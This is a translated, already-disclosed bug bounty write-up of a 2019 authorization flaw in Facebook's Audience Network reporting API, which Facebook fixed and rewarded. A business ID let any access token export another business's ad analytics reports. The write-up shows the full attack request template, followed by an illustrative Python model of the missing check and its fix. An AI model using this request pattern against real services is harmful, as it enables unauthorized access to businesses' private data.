[Translation] Unauthorized access to business users' Facebook ad analytics reports (Export Facebook audience network reports of any business)
Info
This is my first time translating an article; a literal translation read rather stiffly, so I have polished the wording.
Description
When generating reports through the API, the server did not strictly check the caller's permissions (access_token).
According to the official documentation, https://developers.facebook.com/docs/audience-network/reporting-api,
the request format is defined as follows:
https://graph.facebook.com///adnetworkanalytics/
The POST data can contain the selected analytics breakdowns, metrics, filter conditions and failure information.
From the documentation we know that the ID in the path can be one of three parameters: APP_ID, BUSINESS_ID or PROPERTY_ID.
When I built requests using the app_id and property_id parameters, the request failed and the API returned an error.
However, when I made the request with a BUSINESS_ID, the server happily returned a response containing a query_id.
Demonstration
Construct the POST request as follows:
https://graph.facebook.com/v3.0/{TARGET_BUSINESS}/adnetworkanalytics?access_token={ATTACKER_ACCESS_TOKEN}
aggregation_period=day&breakdowns=["property","app","placement","country","platform","display_format"]&filters=[{"field":"delivery_method","operator":"IN","values":["standard"]}]
&metrics=["fb_ad_network_cpm","fb_ad_network_ctr","fb_ad_network_show_rate","fb_ad_network_filled_request","fb_ad_network_imp","fb_ad_network_click","fb_ad_network_request","fb_ad_network_revenue","fb_ad_network_fill_rate"]
&ordering_column=metric
&since={EPOCH_FORMAT_DATE}
&until={EPOCH_FORMAT_DATE}
The server returns a query_id and a redirect link; by following the redirected link I could download the generated report.
Impact
An attacker could download the ad analytics reports of any business user at will.
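As an added example (not part of the original writeup and not Facebook's code), the following Python models the authorization decision the report describes: the handler accepts an app, property or business ID in the path, and the flaw was that only the business path skipped the check that the access_token's owner may read that entity's reports. Tokens, users and entity IDs are constructed; the body parser handles the query-string-with-JSON shape of the request shown above.

```python
import json
import secrets
from urllib.parse import parse_qs

# Constructed sample data (not real Facebook identifiers or tokens).
TOKEN_OWNER = {"tok_attacker": "user_attacker", "tok_victim": "user_victim"}
ENTITY_ADMINS = {  # who may read Audience Network reports for each entity
    ("app", "app_111"): {"user_victim"},
    ("property", "prop_222"): {"user_victim"},
    ("business", "biz_333"): {"user_victim"},
}

# Body shape from the writeup: query-string encoded, list-valued fields carry JSON.
SAMPLE_BODY = (
    "aggregation_period=day"
    '&breakdowns=["property","app","placement","country"]'
    '&filters=[{"field":"delivery_method","operator":"IN","values":["standard"]}]'
    '&metrics=["fb_ad_network_imp","fb_ad_network_revenue"]'
    "&ordering_column=metric&since=1546300800&until=1547164800"
)

def parse_report_body(body):
    """Decode the POST body; JSON-valued fields are parsed, the rest kept as strings."""
    fields = {k: v[0] for k, v in parse_qs(body, strict_parsing=True).items()}
    for key in ("breakdowns", "filters", "metrics"):
        if key in fields:
            fields[key] = json.loads(fields[key])
    return fields

def create_report_query(token, entity_type, entity_id, body, check_business=True):
    """Model of the /{ID}/adnetworkanalytics handler. Returns {"query_id": ...} or
    {"error": ...}. check_business=False reproduces the reported flaw: app and
    property IDs are authorized against the token's owner, a business ID is not."""
    user = TOKEN_OWNER.get(token)
    if user is None:
        return {"error": "invalid access_token"}
    skip_check = entity_type == "business" and not check_business
    if not skip_check and user not in ENTITY_ADMINS.get((entity_type, entity_id), set()):
        return {"error": f"not authorized for {entity_type} {entity_id}"}
    params = parse_report_body(body)
    if not params.get("metrics"):
        return {"error": "metrics must be a non-empty JSON list"}
    # A query_id is only ever minted after the entity-level check has passed.
    return {"query_id": secrets.token_hex(8), "entity": f"{entity_type}/{entity_id}",
            "since": int(params["since"]), "until": int(params["until"])}
```

The fix is the uniform check: whatever ID type the path carries, the token's owner must be an admin of that exact entity before any query_id is issued.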
Timeline
Jan 9, 2019 — Report sent
Jan 9, 2019 — Clarification requested by Facebook
Jan 9, 2019 — Clarification sent
Jan 9, 2019 — Clarification requested by Facebook
Jan 9, 2019 — Clarification sent
Jan 10, 2019 — Acknowledged by Facebook
Feb 12, 2019 — Fixed by Facebook
Feb 12, 2019 — Bounty awarded by Facebook
Brainstorm (personal summary)
One parameter was not validated, and that led to unauthorized access. Simple, isn't it?
Yes: finding vulnerabilities means finding the details that others have not paid attention to or tested.
Obey the law, observe carefully, and dare to try!